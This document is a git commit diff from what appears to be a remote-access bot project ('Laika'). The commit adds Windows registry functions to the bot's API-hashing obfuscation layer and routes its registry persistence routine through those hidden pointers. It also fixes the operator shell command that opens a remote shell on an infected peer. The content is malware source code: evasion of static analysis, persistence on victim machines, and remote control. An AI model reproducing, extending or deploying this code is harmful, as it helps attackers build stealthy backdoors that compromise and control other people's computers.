Bot: added Registry related API to laikaO_init()

- Also fixed misc. shell bug.
2022-07-12 18:09:23 -05:00 · 2022-07-12 18:09:23 -05:00 · 25c18db6bc
parent 5d2f492c41
commit 25c18db6bc
4 changed files with 24 additions and 15 deletions
--- a/bot/include/obf.h
+++ b/bot/include/obf.h
@ -12,11 +12,19 @@ typedef HINSTANCE(WINAPI *_ShellExecuteA)(HWND, LPCSTR, LPCSTR, LPCSTR, LPCSTR,
 typedef HRESULT(WINAPI *_CreatePseudoConsole)(COORD, HANDLE, HANDLE, DWORD, HPCON *);
 typedef void(WINAPI *_ClosePseudoConsole)(HPCON);
 typedef BOOL(WINAPI *_CreateProcessA)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION);
+typedef LSTATUS(WINAPI *_RegOpenKeyExA)(HKEY, LPCSTR, DWORD, REGSAM, PHKEY);
+typedef LSTATUS(WINAPI *_RegCloseKey)(HKEY);
+typedef LSTATUS(WINAPI *_RegSetValueExA)(HKEY, LPCSTR, DWORD, DWORD, const BYTE *, DWORD);
+typedef LSTATUS(WINAPI *_RegQueryValueExA)(HKEY, LPCSTR, LPDWORD, LPDWORD, LPBYTE, LPDWORD);

 extern _ShellExecuteA oShellExecuteA;
 extern _CreatePseudoConsole oCreatePseudoConsole;
 extern _ClosePseudoConsole oClosePseudoConsole;
 extern _CreateProcessA oCreateProcessA;
+extern _RegOpenKeyExA oRegOpenKeyExA;
+extern _RegCloseKey oRegCloseKey;
+extern _RegSetValueExA oRegSetValueExA;
+extern _RegQueryValueExA oRegQueryValueExA;
 #endif

 void laikaO_init();
--- a/bot/win/winobf.c
+++ b/bot/win/winobf.c
@ -8,6 +8,8 @@
 */

 #include <process.h>
+#include <shlobj.h>
+#include <shlwapi.h>
 #include <windows.h>

 /* ======================================[[ API Hashing ]]====================================== */
@ -139,11 +141,13 @@ _ShellExecuteA oShellExecuteA;
 _CreatePseudoConsole oCreatePseudoConsole;
 _ClosePseudoConsole oClosePseudoConsole;
 _CreateProcessA oCreateProcessA;
+_RegOpenKeyExA oRegOpenKeyExA;
+_RegCloseKey oRegCloseKey;
+_RegSetValueExA oRegSetValueExA;
+_RegQueryValueExA oRegQueryValueExA;

 /* TODO:
    GetEnvironmentVariable
-
-    windows registry related API
 */

 void laikaO_init()
@ -155,11 +159,8 @@ void laikaO_init()
    oCreatePseudoConsole = (_CreatePseudoConsole)findByHash("kernel32.dll", 0x7310ef7);
    oClosePseudoConsole = (_ClosePseudoConsole)findByHash("kernel32.dll", 0xeff42590);
    oCreateProcessA = (_CreateProcessA)findByHash("kernel32.dll", 0x9e687c1d);
-
-/*
-    hash = getHashName("InitializeProcThreadAttributeList");
-    printf("InitializeProcThreadAttributeList: real is %p, hashed is %p. [HASH: %x]\n",
-           (void *)InitializeProcThreadAttributeList,
-           findByHash("kernel32.dll", hash), hash);
-*/
+    oRegOpenKeyExA = (_RegOpenKeyExA)(findByHash("advapi32.dll", 0x15041404));
+    oRegCloseKey = (_RegCloseKey)(findByHash("advapi32.dll", 0xae0cf309));
+    oRegSetValueExA = (_RegSetValueExA)(findByHash("advapi32.dll", 0xcb91dcf7));
+    oRegQueryValueExA = (_RegQueryValueExA)(findByHash("advapi32.dll", 0x4298d735));
 }
--- a/bot/win/winpersist.c
+++ b/bot/win/winpersist.c
@ -49,7 +49,7 @@ HKEY openReg(HKEY key, LPCSTR subKey)
 {
    HKEY hKey;

-    if (RegOpenKeyExA(key, subKey, 0, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS)
+    if (oRegOpenKeyExA(key, subKey, 0, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS)
        LAIKA_ERROR("Failed to open registry key!\n");

    return hKey;
@ -63,12 +63,12 @@ LPSTR readReg(HKEY key, LPCSTR val, LPDWORD sz)

    /* get the size */
    *sz = 0;
-    RegQueryValueExA(key, val, NULL, NULL, NULL, sz);
+    oRegQueryValueExA(key, val, NULL, NULL, NULL, sz);

    if (*sz != 0) {
        str = (LPSTR)laikaM_malloc(*sz);

-        if ((ret = RegQueryValueExA(key, val, NULL, NULL, str, sz)) != ERROR_SUCCESS)
+        if ((ret = oRegQueryValueExA(key, val, NULL, NULL, str, sz)) != ERROR_SUCCESS)
            LAIKA_ERROR("Failed to read registry!\n");
    }

@ -79,7 +79,7 @@ void writeReg(HKEY key, LPCSTR val, LPSTR data, DWORD sz)
 {
    LONG code;

-    if ((code = RegSetValueExA(key, val, 0, REG_SZ, (LPBYTE)data, sz)) != ERROR_SUCCESS)
+    if ((code = oRegSetValueExA(key, val, 0, REG_SZ, (LPBYTE)data, sz)) != ERROR_SUCCESS)
        LAIKA_ERROR("Failed to write registry!\n");
 }

@ -190,7 +190,7 @@ void installRegistry()
        writeReg(reg, regKeyVal, newRegValue, newRegSz);
    }

-    RegCloseKey(reg);
+    oRegCloseKey(reg);
    LAIKA_BOX_SKID_END(regKeyVal);
    LAIKA_BOX_SKID_END(regKey);
 }
--- a/shell/src/scmd.c
+++ b/shell/src/scmd.c
@ -84,7 +84,7 @@ void openShellCMD(tShell_client *client, int argc, char *argv[])
    id = shellS_readInt(argv[1]);
    peer = shellS_getPeer(client, id);

-    PRINTINFO("Opening shell on peer %04d...\n");
+    PRINTINFO("Opening shell on peer %04d...\n", id);
    PRINTINFO("Use CTRL+A to kill the shell\n");

    /* open shell on peer */